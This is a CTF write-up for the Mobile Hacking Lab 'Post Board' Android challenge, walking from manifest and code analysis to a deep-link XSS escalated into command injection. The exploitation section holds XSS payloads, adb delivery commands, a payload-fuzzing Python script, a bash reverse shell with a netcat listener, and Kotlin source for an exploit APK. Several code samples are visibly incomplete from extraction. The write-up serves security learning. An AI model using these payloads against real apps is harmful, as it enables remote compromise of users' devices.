Mobile Hacking Lab - Post Board
Exploiting XSS for Remote Code Execution in Android WebView: A Mobile Hacking Lab CTF Challenge
When it comes to mobile application, security bugs are often overlooked. This detailed walkthrough explores a mobile application CTF challenge from Mobile Hacking Lab, containing vulnerabilities found in the real world. The main goal of this challenge is to use a Cross-Site Scripting (XSS) vulnerability to achieve Remote Code Execution (RCE) in the WebView component of an Android app.
You can access the challenge here: Mobile Hacking Lab - Post Board
The Challenge Overview
The challenge “Post Board”, presents a detailed scenario: We are tasked to identify and exploit a vulnerability within an Android application’s WebView component susceptible to Cross-Site Scripting (XSS) attacks. The ultimate goal is to utilize this XSS vulnerability to gain Remote Code Execution (RCE) on the device, thus highlightin a significant security oversight in the management of web content within the mobile applications.
Discovery Phase
I fired up the app and noticed we could post messages.
To test it’s functionality, I sent a basic test
Manifest Analysis
I grabbed the APK off the device and broke it down to take a closer look at the AndroidManifest.xml
Let’s dive into checking out the AndroidManifest.xml
file, shall we?
Diving deeper into the “PostBoard” application’s Android manifest reveals a critical configuration within the <activity>
declaration for MainActivity
Activity Declaration
<activity android:exported="true" android:name="com.mobilehackinglab.postboard.MainActivity">
: This attribute signifies that MainActivity
is accessible to other apps. An activity with exported=true
can be started by components of other applications using an Intent
. While necessary for certain functionalities, such as deep linking, this also means that the activity can be invoked by external applications, which could be a concern if the activity handles sensitive information or performs critical operations without adequate security checks.
MAIN Intent Filter
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
This intent filter marks MainActivity
as the entry point of the application. It’s what allows the activity to be launched directly from the launcher.
Intent Filters and Deep Links
The manifest defines an activity
with intent-filters
designed to handle specific actions and URI schemes:
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:host="postmessage" android:scheme="postboard"/>
This configuration is particularly noteworthy for a couple of reasons:
- Deep Linking: The specified
allows the app to handle deep links, with URLs following thepostboard://postmessage
schema. Deep links are a powerful feature for enhancing app interactivity and integration with web content. However, they also introduce a vector through which malicious URLs might be crafted to exploit vulnerabilities in how the app processes incoming data, potentially facilitating XSS attacks if the URL content is not properly sanitized before being displayed in a WebView. - Exposure to Web Content: The inclusion of a browsable category alongside a custom URL scheme directly points to the app’s interaction with web content. When combined with WebView, this interactivity necessitates rigorous security measures to prevent malicious web content from exploiting the app, especially concerning XSS attacks.
Code Analysis
Let’s fire up jadx-gui and dig through the code to get a grip on how this app works.
The Foundation: onCreate
public void onCreate(Bundle savedInstanceState) {
ActivityMainBinding inflate = ActivityMainBinding.inflate(getLayoutInflater());
this.binding = inflate;
At the outset, onCreate
is where the magic begins. This method is the launching pad for the activity’s lifecycle, setting up the initial state of the application:
- Inflation of
: The app leverages View Binding to interact with the layout. This approach enhances code clarity and safety when manipulating the UI, as it provides direct access to components without the boilerplate offindViewById
. - Initialization of
: A curious addition is the initialization ofCowsayUtil
. This utility, presumably, is intended to bring the classic Linuxcowsay
command to Android. Its inclusion hints at its potential use within the challenge, particularly in how it interacts with the user or processes input.
Configuring the WebView: setupWebView
private final void setupWebView(WebView webView) {
webView.setWebChromeClient(new WebAppChromeClient());
webView.addJavascriptInterface(new WebAppInterface(), "WebAppInterface");
The setupWebView
method is particularly interesting for several reasons:
- Enabling JavaScript: By setting
to true, the app allows the execution of JavaScript within the WebView. This decision is double-edged; it loads the app with dynamic content and interactivity but also opens the door to XSS vulnerabilities if the content isn’t properly sanitized! - Adding a
: The introduction of aWebAppInterface
presents an interesting bridge between the web content and native Android functionality. This interface is a money for the challenge, as it likely exposes methods that can be called from JavaScript, offering a pathway to explore potential XSS to RCE exploits.
Handling Incoming Intents: handleIntent
private final void handleIntent() {
Intent intent = getIntent();
String action = intent.getAction();
Uri data = intent.getData();
if ("android.intent.action.VIEW".equals(action) && data != null && "postboard".equals(data.getScheme()) && "postmessage".equals(data.getHost())) {
String path = data.getPath();
byte[] decode = Base64.decode(path != null ? StringsKt.drop(path, 1) : null, 8);
String message = new String(decode, Charsets.UTF_8).replace("'", "\\'");
binding.webView.loadUrl("javascript:WebAppInterface.postMarkdownMessage('" + message + "')");
The handleIntent
method reveals how the app processes incoming intents, particularly those with the action android.intent.action.VIEW
. This processing logic is central to understanding how the app can be manipulated externally, especially through deep links:
- URL Scheme and Host Validation: The app checks if the incoming intent matches specific criteria (scheme:
, host:postmessage
). - Base64 Decoding and Dynamic Content Loading: The method decodes Base64-encoded data from the URL, attempts to sanitize it by escaping single quotes, and then dynamically loads it into the WebView using
. It illustrates a direct vector for XSS attacks if the content isn’t adequately sanitized before being rendered… - Error Handling with
: In case of exceptions, the app falls back to displaying a cowsay message.
Let’s go over the WebAppChromeClient
class. This class extends WebChromeClient
, providing an avenue to handle JavaScript alerts within the application’s WebView.
Handling JavaScript Alerts: onJsAlert
The onJsAlert
method is a central piece of this class, capturing JavaScript alert dialog requests from web content loaded within the WebView.
@Override // android.webkit.WebChromeClient
public boolean onJsAlert(WebView view, String url, String message, final JsResult result) {
Intrinsics.checkNotNullParameter(view, "view");
Intrinsics.checkNotNullParameter(url, "url");
Intrinsics.checkNotNullParameter(message, "message");
Intrinsics.checkNotNullParameter(result, "result");
new AlertDialog.Builder(view.getContext()).setMessage(message).setPositiveButton(17039370, new DialogInterface.OnClickListener() {
@Override // android.content.DialogInterface.OnClickListener
public final void onClick(DialogInterface dialogInterface, int i) {
WebAppChromeClient.onJsAlert$lambda$0(result, dialogInterface, i);
return true;
This method demonstrates the application’s strategy for rendering JavaScript alerts. Rather than using the default browser alert dialog, it opts to create a custom Android dialog. This approach allows for a more integrated user experience, ensuring that the alert’s look and feel align with the rest of the application.
- Custom Alert Dialogs: The usage of
to display the alert message is particularly interesting. It showcases the flexibility Android offers in customizing how web content interacts with users, enhancing the app’s UI/UX design.
Dialog Interaction Handling
The method includes a callback for when the dialog’s positive button is clicked, invoking onJsAlert$lambda$0
public static final void onJsAlert$lambda$0(JsResult result, DialogInterface dialogInterface, int i) {
Intrinsics.checkNotNullParameter(result, "$result");
- Confirming the Result: The callback primarily confirms the JavaScript result, effectively closing the alert dialog. This is a critical step in managing the dialog lifecycle, ensuring that the web content does not remain in a waiting state and that user interactions are properly acknowledged.
Let’s go over the WebAppInterface
class, it offers a fascinating glimpse into how the “Post Board” Android application integrates web functionalities within its native framework. Let’s explore the technical details and implications of this class…
Interfacing with Web Content: @JavascriptInterface
public final String getMessages() {...}
public final void clearCache() {...}
public final void postMarkdownMessage(String markdownMessage) {...}
public final void postCowsayMessage(String cowsayMessage) {...}
The use of @JavascriptInterface
, marking methods that JavaScript code within the app’s WebView can invoke. This bridge between the web and native app layers is both powerful and potentially dangerous, this could lead to exposed sensitive functionalities/data.
Fetching Messages: getMessages
public final String getMessages() {
List messages = this.cache.getMessages();
String jSONArray = new JSONArray((Collection) messages).toString();
return jSONArray;
The getMessages
method fetches messages stored in a cache, returning them as a JSON array string. This function illustrates the app’s capability to retrieve data for web presentation, showcasing an aspect of dynamic content loading.
Cache Management: clearCache
public final void clearCache() {
Simple yet essential, the clearCache
method show the importance of app hygiene, enabling the clearing of cached data. This function reflects a consideration for performance and data integrity within the app’s design.
Markdown Processing: postMarkdownMessage
public final void postMarkdownMessage(String markdownMessage) {...}
This method stands out as particularly interesting. It processes a markdown message, converting it to HTML. The series of regex replacements from markdown to various HTML tags (<pre>
, <code>
, <img>
, etc.) indicates sophisticated text processing. However, this functionality could be a double-edged sword, harboring potential XSS vulnerabilities if the input markdown is not properly sanitized, making it an interesting method for the challenge.
Displaying Cowsay Messages: postCowsayMessage
public final void postCowsayMessage(String cowsayMessage) {...}
Lastly, postCowsayMessage
provides a unique and creative touch to the app, using the CowsayUtil
to generate ASCII art messages…
Can we use it eventually?
The CowsayUtil
class emerges as a fascinating piece of the puzzle. Let’s dive into it…
public final class CowsayUtil {
public static final Companion Companion = new Companion(null);
private static final String SCRIPT_NAME = "";
private static String scriptPath;
At its core, CowsayUtil
holds a reference to a script named
, intended to be placed within the application’s assets. The Companion
object within the class serves as a singleton instance, providing utility methods to interact with the cowsay
Initialization: Preparing the cowsay Command
The initialization process, as it sets the stage for executing the cowsay
script within the Android environment:
public final void initialize(Context context) {
File file = new File(context.getFilesDir(), CowsayUtil.SCRIPT_NAME);
InputStream open = context.getAssets().open(CowsayUtil.SCRIPT_NAME);
CowsayUtil.scriptPath = file.getAbsolutePath();
This method copies the
script from the application’s assets to a file within the app’s private files directory and marks it as executable. This step, as it allows the script to be run by the app, bridging the gap between the static asset and dynamic execution.
Running cowsay: Bridging Android and Unix
The runCowsay
method embodies the intersection of Android development and Unix command execution:
public final String runCowsay(String message) {
String[] command = {"/bin/sh", "-c", CowsayUtil.scriptPath + ' ' + message};
Process process = Runtime.getRuntime().exec(command);
Here, we see the application constructing a command to execute the cowsay
script with the provided message. This operation is a classic example of running external processes from Java.
Very interesting… This rises 2 questions:
- Input Validation: How does
validate themessage
parameter? Improper validation could lead to command injection vulnerabilities, allowing attackers to execute arbitrary commands… - Execution Environment: The use of
to execute a script highlights the intersection of Android and Unix/Linux environments. Can we make use of it?
Application Exploitation Strategy
After going over the code, from what I’ve gathered, the heart of the app boils down to a few key parts:
- MainActivity: The primary activity that initializes the
and loads the localindex.html
file. - WebAppInterface: A class exposed to the
for JavaScript to call Android methods. - CowsayUtil: A utility for running a
shell script, illustrating how native functionalities might be invoked.
Exploitation: WebView XSS
Let’s start with the XSS. This was my approach:
- WebView Configuration:
enables JavaScript and loads content from theassets
directory, making it susceptible to XSS attacks if the content includes user-supplied input.webView.getSettings().setJavaScriptEnabled(true); webView.addJavascriptInterface(new WebAppInterface(), "WebAppInterface"); webView.loadUrl("file:///android_asset/index.html");
- Unsanitized Input Handling: Methods within
do not sanitize inputs before processing, creating a potential vector for XSS. handleIntent
takes Base64 as input, so the payload must be encoded.
Crafting the XSS Payload
To exploit the XSS vulnerability, we need a payload that can bypass input sanitization (if any) and execute JavaScript within the WebView context.
My approach was simple:
Use ADB to interact with the WebView component within the “Post Board” application. The aim was to programmatically navigate to a specific part of the app and deliver a payload encoded in base64 format directly to it (remember the handleIntent
? ).
adb shell am start -a android.intent.action.VIEW -d "postboard://postmessage/[INSERT BASE64 PAYLOAD]" com.mobilehackinglab.postboard/.MainActivity
The command is executed to launch the “Post Board” app directly to a state where it processes the supplied base64 encoded text.
Now, I was lazy and didn’t want to spend much time trying to find a payload that worked so I created a simple Python script to help with the discovery. The script takes a list of payloads as input and run the adb command. There’s a 5 seconds delay between each commands to let the the app breathe.
If things go as planned, the app should execute the JavaScript.
import argparse
import base64
import subprocess
import time
def construct_adb_command(payload):
This function constructs the ADB command necessary to send the payload to the Android application.
It encodes the payload in base64 format and embeds it into the custom URL scheme expected by the app.
base64_payload = base64.b64encode(payload.encode()).decode()
return f'adb shell am start -a android.intent.action.VIEW -d "postboard://postmessage/{base64_payload}" com.mobilehackinglab.postboard/.MainActivity'
def read_payloads(file_path):
This function reads a list of XSS payloads from a specified file.
Each line in the file is considered a separate payload.
with open(file_path, 'r') as file:
return file.readlines()
def main(file_path):
This is the main function where the script starts executing.
It reads payloads from a file, constructs the ADB command for each payload, and executes them one by one.
A 5-second pause is added between each command to ensure the app has enough time to process each request.
payloads = read_payloads(file_path)
for payload in payloads:
payload = payload.strip() # Clean the payload by removing any leading/trailing whitespace or newline characters.
adb_command = construct_adb_command(payload)
print(f"Running: {adb_command}"), shell=True) # Execute the ADB command to send the payload to the app.
time.sleep(5) # Wait for 5 seconds to prevent overwhelming the app with too many requests at once.
if __name__ == "__main__":
The script entry point. It parses command-line arguments to get the path of the file containing XSS payloads.
Then it calls the main function with the file path as the argument.
parser = argparse.ArgumentParser(description='Run ADB commands with base64 encoded XSS payloads.')
parser.add_argument('file_path', type=str, help='Path to the file containing XSS payloads.')
args = parser.parse_args()
Running the script is simple:
python3 list.txt
After a short period of time, I got a hit!
I stopped the script from running, and checked my terminal to see which payload triggered the XSS.
I decoded the Base64 string to see what the payload was:
The payload: "onclick=prompt(8)><svg/onload=prompt(8)>"@x.y
I tried the command without running the script and tweaked the payload to see if it was still triggering.
I removed some of the clutter in the payload and <svg/onload=prompt(8)>
worked like a charm.
adb shell am start -a android.intent.action.VIEW -d "postboard://postmessage/PHN2Zy9vbmxvYWQ9cHJvbXB0KDgpPg==" com.mobilehackinglab.postboard/.MainActivity
Achieving Remote Code Execution
The final step of the challenge was to escalate from XSS to RCE. This required a different approach, given the WebAppInterface
and CowsayUtil
provided methods. The winning payload, when decoded from Base64, essentially attempts to leverage the application’s functionality to run arbitrary commands, signifying an exploit where the postCowsayMessage
method could be manipulated for unintended command execution.
The Malicious Payload
The payload is quite simple, we have to make a call to the WebAppInterface
method that invoke the postCowsayMessage
. This will trigger the runCowsay
method from the CowsayUtil
Let’s try something:
: This invokes a method from an object (WebAppInterface
) exposed to the WebView via @JavascriptInterface
in the application. The method postCowsayMessage
is called with the argument 'HELLO'
Let’s Base64 encode the payload:
Next, adb magic:
adb shell am start -a android.intent.action.VIEW -d "postboard://postmessage/PHN2Zy9vbmxvYWQ9IldlYkFwcEludGVyZmFjZS5wb3N0Q293c2F5TWVzc2FnZSgndGVzdCcpIj4=" com.mobilehackinglab.postboard/.MainActivity
The cow is now saying “test”, means that our call to postCowsayMessage
Given that the message is executed, it opens up the possibility to embed any bash command within the parentheses of the payload. I decided to go for a full reverse shell…because it’s fun.
It’s important to point out, after multiple attempts, that ending the text with a semicolon (;
) is to ensured the execution of the query, especially when the goal is to escape the text.
<svg/onload="WebAppInterface.postCowsayMessage('test;bash -i >& /dev/tcp/ 0>&1')">
Encode the payload to Base64:
Start a Netcat listener:
nc -lvp 8081
Let’s send the payload:
adb shell am start -a android.intent.action.VIEW -d "postboard://postmessage/PHN2Zy9vbmxvYWQ9IldlYkFwcEludGVyZmFjZS5wb3N0Q293c2F5TWVzc2FnZSgncHdkO2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTEuMy4yLzgwODEgMD4mMScpIj4K" com.mobilehackinglab.postboard/.MainActivity
Shell time :)
Advancing Exploit Techniques
To illustrate the vulnerabilities present in the Post Board application (WebView XSS and Remote Code Execution (RCE)), I developed a custom APK. This application, when launched, is programmed to automatically establish a reverse shell connection from the targeted device. This approach highlights the exploitation from the initial user interaction to obtaining unauthorized access to execute commands on the device.
The full code below, don’t hesitate to reach out if you have issue running it!
package com.example.mobilehackinglab_postboard_poc
import android.content.Intent
import android.os.Bundle
import java.util.Base64
// Main activity that launches the exploit.
class ExploitActivity : AppCompatActivity() {
// Lifecycle method called when the activity is created.
override fun onCreate(savedInstanceState: Bundle?) {
// Sets the UI layout for this activity.
// Calls the method to execute the exploit.
// Prepares and launches the exploit.
private fun executeExploit() {
// Defines the target app component to be exploited.
val targetComponent = TargetComponent("com.mobilehackinglab.postboard", "com.mobilehackinglab.postboard.MainActivity")
// Encapsulates the exploit payload.
val exploitData = ExploitData("<svg/onload=\"WebAppInterface.postCowsayMessage('test;bash -i >& /dev/tcp/ 0>&1')\">")
// Encodes the payload in Base64 and prepares the URI.
val encodedUri = exploitData.prepareDataUri()
// Launches the activity in the target app with the exploit data.
launchTargetActivity(targetComponent, encodedUri)
// Launches the target activity with the exploit URI.
private fun launchTargetActivity(targetComponent: TargetComponent, dataUri: String) {
// Constructs an intent to view the exploit URI.
val intent = Intent(Intent.ACTION_VIEW).apply {
// Specifies the target component.
setClassName(targetComponent.packageName, targetComponent.activityName)
// Sets the data URI containing the exploit.
data = Uri.parse(dataUri)
// Attempts to start the activity with the intent.
// Safely attempts to start an activity with the given intent.
private fun safelyStartActivity(intent: Intent) {
try {
// Tries to start the activity.
} catch (e: Exception) {
// Logs the exception if the activity fails to start.
// Represents the payload to be exploited.
class ExploitData(private val payload: String) {
// Prepares the data URI with the encoded payload.
fun prepareDataUri(): String {
// Encodes the payload in Base64 format.
val base64Payload = Base64.getEncoder().encodeToString(encryptPayload(payload).toByteArray())
// Returns the complete data URI for the exploit.
return "postboard://postmessage/$base64Payload"
// Represents the target app component for the exploit.
data class TargetComponent(val packageName: String, val activityName: String)
Install the APK in Corellium:
Launch the exploit app:
Profit ;)
Closing out our walkthrough of “Post Board”, we’ve journeyed through the world where web and mobile vulnerabilities meet. This exploration served not just as a technical exercise but as a learning opportunity, showcasing the need for securing Android applications against XSS and RCE vulnerabilities.
From examining app functionalities to dissecting the AndroidManifest.xml
, and reading into the code, every step reinforced the significance of secure coding and thorough web content management. Crafting and executing payloads demonstrated how theoretical vulnerabilities can lead to real-world exploits, using ADB commands and Python for practical application.
Thank you Mobile Hacking Lab for this awesome challenge. Can’t wait for the next one!